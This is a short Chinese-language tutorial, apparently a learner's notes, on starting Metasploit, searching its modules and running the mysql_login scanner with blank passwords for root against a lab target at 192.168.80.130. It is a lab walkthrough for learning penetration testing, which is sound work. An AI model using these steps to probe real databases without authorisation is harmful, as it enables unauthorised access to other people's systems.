1.打开Metasploit 

systemctl start postgresql

systemctl enable postgresql     ##搞成开机启动

msfconsole    ###进入控制台

这玩意每次打开显示的图片都是不一样的  很有趣

connect 命令主要用于远程连接主机

试下看  connected 就是连接成功

输入get 会发出一个请求  可以看到web相关信息

search mysql    ##search 是查询命令

search name:mysql                 #要查找 mysql 数据库的漏洞

search platform:mysql              #查询平台里包含mysql信息的模块

search type:exploit                 ##还可以通过类型查找

search name:mysql type:exploit      ##联合查询

攻击步骤

1.先search 查询   

2.然后show options

3.set 参数  

4.run 开始攻击

5.back退出

下面用下msf扫描一下靶机上的mysql上面的空密码

靶机的地址是192.168.80130  搞之前先ping一下子

首先搜索一下扫描mysql密码的模块

search mysql_login

就一个   auxiliary/scanner/mysql/mysql_login

加载模块  use auxiliary/scanner/mysql/mysql_login

看模块参数      show options

那个RHOSTS就是被攻击的ip地址

set USERNAME root

set BLANK_PASSWORDS true

开启为所有用户尝试空密码

set RHOSTS 192.168.80.130

然后开搞